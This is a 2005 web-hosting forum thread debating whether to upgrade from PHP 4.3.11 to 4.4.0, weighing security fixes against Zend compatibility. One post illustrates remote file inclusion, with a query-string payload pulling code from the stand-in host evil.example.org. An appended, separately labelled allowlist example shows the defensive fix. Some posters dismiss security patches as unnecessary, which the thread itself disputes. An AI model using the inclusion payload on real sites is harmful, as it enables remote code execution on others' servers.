  1. #1
    Join Date
    Jul 2002
    Posts
    3,374

    Question php4.3.11 is very old?

    Got a question from a user who has been told that the PHP version on my server is very old... uh... PHP 4.4.0 just came out, and from the feedback it's not worth upgrading to PHP 4.4.0, and most web apps don't support PHP 5.

    Why do people want the latest when it is not stable or widely supported?

  2. #2
    Join Date
    Oct 2003
    Location
    Israel
    Posts
    133
    PHP 4.4.0 is pretty much like 4.3.11, it's simply a small security release. I would advise you to upgrade.

    - Tomer

  3. #3
    I'd have to agree, I had some exploits discovered with older versions that caused me some problems.

    Regards,
    Aaron

  4. #4
    Join Date
    Jul 2002
    Posts
    3,374
    Originally posted by Tomer
    PHP 4.4.0 is pretty much like 4.3.11, it's simply a small security release. I would advise you to upgrade.

    - Tomer
    What kind of security risk? Does it really make a difference?

  5. #5
    Join Date
    Jan 2005
    Location
    Minneapolis, MN
    Posts
    966
    Originally posted by jt2377
    What kind of security risk? Does it really make a difference?
    http://www.php.net/release_4_4_0.php

    There is also the changelog: http://www.php.net/ChangeLog-4.php#4.4.0
    Doyle Lewis

  6. #6
    Join Date
    Mar 2004
    Location
    Singapore
    Posts
    6,990
    I heard that Zend has a problem with PHP 4.4 upgrade, anyone facing such problems?

  7. #7
    Join Date
    Jul 2002
    Posts
    3,374
    Originally posted by boonchuan
    I heard that Zend has a problem with PHP 4.4 upgrade, anyone facing such problems?
    I also heard the same thing. I don't really see that much risk in not upgrading to 4.4.0.

  8. #8
    Join Date
    Aug 2003
    Location
    Kansas City, MO
    Posts
    195
    We upgraded one server to PHP 4.4.0 and it caused problems with Zend.

  9. #9
    Uhh, ya, I had problems with Zend too, but I did get it fixed over time. Anyway, it's not worth upgrading if you ask me.

  10. #10
    Join Date
    Mar 2005
    Posts
    75
    We upgraded one server to PHP 4.4.0 and it caused problems with Zend.
    Just install new 2.5.10a version of Zend Optimizer, and everything should be fine.

  11. #11
    Join Date
    Jul 2005
    Location
    Chicago
    Posts
    34
    We went from PHP 4.3.10 to PHP 4.3.11 and no more plans to upgrade PHP; will give PHP team more time to update/patch it

  12. #12
    Join Date
    Jun 2003
    Location
    United States of America
    Posts
    1,847
    All these kinds of upgrades make me sick some days, especially when you do it on a production server. I usually just build a new vserver to see what happens.

  13. #13
    If you upgrade to 4.4.0, make sure you upgrade Zend to 2.5.10 and the latest version of Ioncube.

  14. #14
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    Upgraded to PHP 4.4.0 a week ago together with Zend optimizer 2.5.10a and have yet to see any probs with any of the websites on the server.

  15. #15
    Join Date
    Mar 2003
    Location
    Spokane, WA
    Posts
    262
    Perhaps your customer is thinking that PHP 5 has been fully released. I've met a couple of people under that impression.

  16. #16
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).

  17. #17
    Join Date
    Mar 2003
    Location
    Spokane, WA
    Posts
    262
    Excuse me, my bad. PHP 5.1 is what is in beta. Don't mind me, nothing to see here.

  18. #18
    Join Date
    Jan 2004
    Location
    Singapore
    Posts
    1,032
    Unless there is a serious exploit, there is little reason to do so, because exploits are always there even with the new versions, just that the developers are not aware of them yet.

    My own upgrading process was at 4.3.4 then to 4.3.8 but when there was a serious problem with it, I moved to 4.3.10 and 4.3.11

    Some people just want the provider to spend extra resources to suit their little pecky needs of seeing the newest version number on their screens with little to no knowledge of what goes on at all....

    My 2 Cents.

    "If it's not broken, why fix it?"
    -=- GQ Hong -=-
    GalacNet WebMaster

  19. #19
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    Since php.net says for every such security/bugfix release that everyone should update ASAP, it doesn't sound to me like a "customer's whim". For me it's rather the opposite, IMO my customers have every right to expect me to keep crucial system components up to date. Some of the big exploits in scripts like phpBB were PHP version dependent, i.e. when one had the latest PHP version at the point of the exploit, the server was safe from it.

    At any rate, on Windows I'm also for the "if it ain't broken, don't fix it" strategy because it's really true, just had to restore a Windows 2003 Server last week because one of the latest small security patches from Windows Update broke just about everything, the computer wasn't working right any more. OTOH on GNU/Linux this is rather unlikely to happen, with commercial addons like cPanel/WHM it happens now and then, but with the core system it's a very rare thing. Years ago when I was mainly using Windows I never patched anything that worked, but after years of having administered GNU/Linux webservers and using Mac OS X at home, I got into the habit of always keeping things on the latest.

  20. #20
    Join Date
    Jul 2002
    Posts
    3,374
    Originally posted by RambOrc
    Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
    If it ain't broken... you know the old saying, and like someone already said, 4.3.11 is not that much different from 4.4.0. The security risk is rather very small. Software bugs are always there; it's only a matter of seriously bad or minor bad.

    In this case 4.4.0 only fixes some minor bugs that won't pose much of a threat to the server.
    Last edited by jt2377; 07-28-2005 at 07:40 AM.

  21. #21
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    The "it ain't broken" proverb means to me rather that even though Fedora Core 4 is out, I leave a Fedora Core 2 server the way it is, updating it neither to C3 nor to C4. But for me it doesn't mean leaving things unpatched within C2. Same with PHP, 4.4.0 "addresses a serious memory corruption problem" and that's not to be taken lightly IMO.

  22. #22
    Join Date
    Jan 2005
    Posts
    46
    I understand that for a web hosting company security is always a really important point, but sometimes certain upgrades are not really worth it.

    IMHO you should be fine with PHP 4.3.11 bearing in mind you do not allow certain directives on your servers.

  23. #23
    Join Date
    Jul 2005
    Location
    Chicago
    Posts
    34
    Originally posted by hardwarefanatic


    IMHO you should be fine with PHP 4.3.11 bearing in mind you do not allow certain directives on your servers.
    What kind of directives are we talking about here? Share with us so that everybody knows.

  24. #24
    Join Date
    Jan 2005
    Posts
    46
    Originally posted by asbhost
    What kind of directives are we talking about here? Share with us so that everybody knows.
    What I mean is nothing new. You should always disable certain functions you feel are not safe or that you won't need.

    Just to give you an example:
    Imagine you have this script on your site

    <?php

    include "$path/script.php";

    ?>

    With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:

    <?php

    include 'http://evil.example.org/?/script.php';

    ?>

    If allow_url_fopen is enabled (which it is by default), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it has been used many times.

    This is just a basic example of what you need to modify bearing in mind the vulnerabilities discovered. If you get a way of doing this you shouldn't bother to upgrade. Most of the time there's another way round.
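
Added example, not written by any poster in this thread: a hardened counterpart to the include in post #24, in which the request value only selects an entry from a fixed allowlist and never becomes part of the path, so the result does not depend on register_globals or the URL-wrapper settings. It targets current PHP (register_globals was removed in PHP 5.4; allow_url_include exists since PHP 5.2 and is off by default); `ALLOWED_PAGES`, `resolve_include()` and the temporary directory are hypothetical names, and the request values are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the only pages a request may select.
const ALLOWED_PAGES = [
    'news'  => 'news/script.php',
    'forum' => 'forum/script.php',
];

// Map an untrusted request value to a local file path, or null if rejected.
function resolve_include(string $baseDir, $requested): ?string
{
    // Arrays (?path[]=x) and unknown keys are rejected outright; the request
    // value is used only as a lookup key, never concatenated into a path.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $file === false) {
        return null; // directory or file does not exist
    }
    // Defence in depth: the resolved file must still sit under the base
    // directory (catches a symlink planted inside it).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed sample tree so the example runs offline.
$baseDir = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($baseDir . '/news', 0700, true);
file_put_contents($baseDir . '/news/script.php', "<?php echo \"news page\\n\";");

// Constructed request values, including the one quoted in post #24.
$samples = ['news', 'forum', 'http://evil.example.org/?', '../../etc', ['news']];
foreach ($samples as $requested) {
    $file = resolve_include($baseDir, $requested);
    echo json_encode($requested, JSON_UNESCAPED_SLASHES), ' => ',
         $file === null ? 'rejected' : 'include', "\n";
    if ($file !== null) {
        include $file; // only ever a file named in ALLOWED_PAGES
    }
}

// Report the URL-wrapper settings in effect for this interpreter.
foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
    echo $directive, ' = ', var_export(ini_get($directive), true), "\n";
}
```

Only `news` is included here: `forum` is on the allowlist but has no file in the sample tree, and the other three values never match a key.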

  25. #25
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    In the above example, if register_globals is off, does it matter whether allow_url_fopen is on or off?
